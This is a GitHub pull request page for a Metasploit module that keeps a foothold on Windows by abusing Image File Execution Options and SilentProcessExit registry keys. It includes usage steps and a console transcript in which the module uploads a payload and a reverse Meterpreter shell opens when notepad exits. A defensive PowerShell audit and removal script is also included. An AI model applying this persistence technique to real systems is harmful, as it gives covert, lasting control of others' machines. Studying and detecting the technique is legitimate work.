
Add image execute options persistence module #12375

Merged
merged 3 commits into from Oct 4, 2019

Conversation

bwatters-r7
Contributor

@bwatters-r7 bwatters-r7 commented Sep 30, 2019

This module adds a persistence vector to Windows computers.

It relies on a debugger tool that allows you to launch a debugger when a specified process exits (normally or abnormally).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • get an elevated session on a Windows computer
  • use exploit/windows/local/persistence_image_exec_options
  • set session <session>
  • set payload <desired payload> (optional)
  • set verbose true (optional)
  • set IMAGE_FILE <process to attach to>
  • run
  • use exploit/multi/handler
  • set payload <desiredPayload>
  • run
  • on target, run binary specified by IMAGE_FILE
  • on target, close binary specified by IMAGE_FILE

[*] Meterpreter session 8 opened (192.168.135.168:5555 -> 192.168.132.125:49675) at 2019-09-30 16:24:30 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 8...
msf5 exploit(multi/handler) > use exploit/windows/local/persistence_image_exec_options 
msf5 exploit(windows/local/persistence_image_exec_options) > set image_file notepad.exe
image_file => notepad.exe
msf5 exploit(windows/local/persistence_image_exec_options) > set session 8
session => 8
msf5 exploit(windows/local/persistence_image_exec_options) > run

[*] Attempting Persistence on DESKTOP-D1E425Q via session ID: 8
[*] Payload pathname = C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe
[*] Writing GlobalFlag to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
[*] Writing ReportingMode to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe
[*] Writing MonitorProcess to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe
[*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe

(Launch notepad on remote host, then exit)

[*] Started reverse TCP handler on 192.168.135.168:4545 
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4545 -> 192.168.132.125:49679) at 2019-09-30 16:25:49 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
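
The transcript above shows the module writing three values: GlobalFlag under Image File Execution Options\<image>, and ReportingMode plus MonitorProcess under SilentProcessExit\<image>. The following is an added example, not code from the PR or from the Metasploit module: a PowerShell audit that walks those two locations on a host, reports which images are actually armed to launch a monitor process on exit, flags monitor binaries that look like a dropped payload, and can disarm an entry. The value semantics it relies on (GlobalFlag bit 0x200 = FLG_MONITOR_SILENT_PROCESS_EXIT, ReportingMode bit 0x1 = LAUNCH_MONITOR_PROCESS) come from the Windows Global Flags documentation and are an assumption of this script; the PR itself does not state the numeric values it writes. The user-writable-path heuristic is likewise the author's choice, motivated by the %TEMP% payload path in the transcript.

```powershell
# Added example (not the PR's or the module's code): audit and disarm
# SilentProcessExit-based persistence of the kind the module configures.
# Assumed value semantics (Windows Global Flags documentation, not stated in the PR):
#   IFEO\<image>\GlobalFlag                 bit 0x200 = FLG_MONITOR_SILENT_PROCESS_EXIT
#   SilentProcessExit\<image>\ReportingMode bit 0x1   = LAUNCH_MONITOR_PROCESS
#   SilentProcessExit\<image>\MonitorProcess          = command line started when <image> exits
# Reading needs no privilege; Remove-SilentProcessExitMonitor needs an elevated shell.

$IfeoBase = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$SpeBase  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'
$FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200
$LAUNCH_MONITOR_PROCESS          = 0x1

function Get-MonitorExecutable {
    # First token of a command line, with surrounding quotes stripped.
    param([string]$CommandLine)
    if ($CommandLine -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($CommandLine -split '\s+')[0]
}

function Get-SilentProcessExitMonitor {
    # One object per image with a SilentProcessExit entry. 'Armed' is true only
    # when all three values line up so that closing the image launches MonitorProcess.
    if (-not (Test-Path $SpeBase)) { return }
    foreach ($key in Get-ChildItem $SpeBase) {
        $image = $key.PSChildName
        $spe   = Get-ItemProperty -Path $key.PSPath
        $ifeo  = Get-ItemProperty -Path (Join-Path $IfeoBase $image) -ErrorAction SilentlyContinue
        $globalFlag = [int]$ifeo.GlobalFlag        # missing key/value casts to 0
        $reporting  = [int]$spe.ReportingMode
        $monitor    = [string]$spe.MonitorProcess
        $armed = (($globalFlag -band $FLG_MONITOR_SILENT_PROCESS_EXIT) -ne 0) -and
                 (($reporting  -band $LAUNCH_MONITOR_PROCESS) -ne 0) -and
                 ($monitor -ne '')
        $exe = if ($monitor) { Get-MonitorExecutable $monitor } else { $null }
        $signature = 'n/a'
        if ($exe) {
            $signature = if (Test-Path -LiteralPath $exe) {
                (Get-AuthenticodeSignature -LiteralPath $exe).Status.ToString()
            } else { 'FileMissing' }
        }
        # Heuristic, not proof: an armed entry whose monitor lives in a user-writable
        # directory or is unsigned is what the module's default payload drop looks like.
        $suspicious = $armed -and (
            ($exe -match '\\(Temp|AppData|ProgramData|Users\\Public)\\') -or
            ($signature -ne 'Valid'))
        [pscustomobject]@{
            Image          = $image
            Armed          = $armed
            GlobalFlag     = ('0x{0:X}' -f $globalFlag)
            ReportingMode  = $reporting
            MonitorProcess = $monitor
            Signature      = $signature
            Suspicious     = $suspicious
        }
    }
}

function Remove-SilentProcessExitMonitor {
    # Disarm one image: delete its SilentProcessExit key and clear only the 0x200
    # bit in the IFEO GlobalFlag, so unrelated IFEO settings for the image survive.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(Mandatory)][string]$Image)
    $speKey  = Join-Path $SpeBase  $Image
    $ifeoKey = Join-Path $IfeoBase $Image
    if ((Test-Path $speKey) -and $PSCmdlet.ShouldProcess($speKey, 'Remove key')) {
        Remove-Item -Path $speKey -Recurse
    }
    if (Test-Path $ifeoKey) {
        $flag = [int](Get-ItemProperty -Path $ifeoKey).GlobalFlag
        if ((($flag -band $FLG_MONITOR_SILENT_PROCESS_EXIT) -ne 0) -and
            $PSCmdlet.ShouldProcess($ifeoKey, 'Clear FLG_MONITOR_SILENT_PROCESS_EXIT')) {
            $newFlag = $flag -band (-bnot $FLG_MONITOR_SILENT_PROCESS_EXIT)
            if ($newFlag -eq 0) { Remove-ItemProperty -Path $ifeoKey -Name GlobalFlag }
            else { Set-ItemProperty -Path $ifeoKey -Name GlobalFlag -Value $newFlag -Type DWord }
        }
    }
}

# Usage:
#   Get-SilentProcessExitMonitor | Format-Table -AutoSize
#   Get-SilentProcessExitMonitor | Where-Object Suspicious |
#       ForEach-Object { Remove-SilentProcessExitMonitor -Image $_.Image -WhatIf }
```

Run the removal with -WhatIf first: legitimate debugging setups (developers using gflags, crash-dump collection) also populate SilentProcessExit, so only entries whose monitor is an unexpected, unsigned binary should be removed, and the dropped payload file named in MonitorProcess should be collected before the key is deleted.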

@busterb busterb self-assigned this Oct 4, 2019
@busterb
Member

busterb commented Oct 4, 2019

Oh for Pete's sake, this is neat. I guess you can do something similar with core handlers on Linux systems.

@bcook-r7 bcook-r7 merged commit 8142f22 into rapid7:master Oct 4, 2019
@busterb
Member

busterb commented Oct 4, 2019

Release Notes

This adds a module for persisting a payload session by using a Windows feature that allows for debugging a specified process by name. The module does require escalated privileges initially in order to configure the debug process.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 14, 2019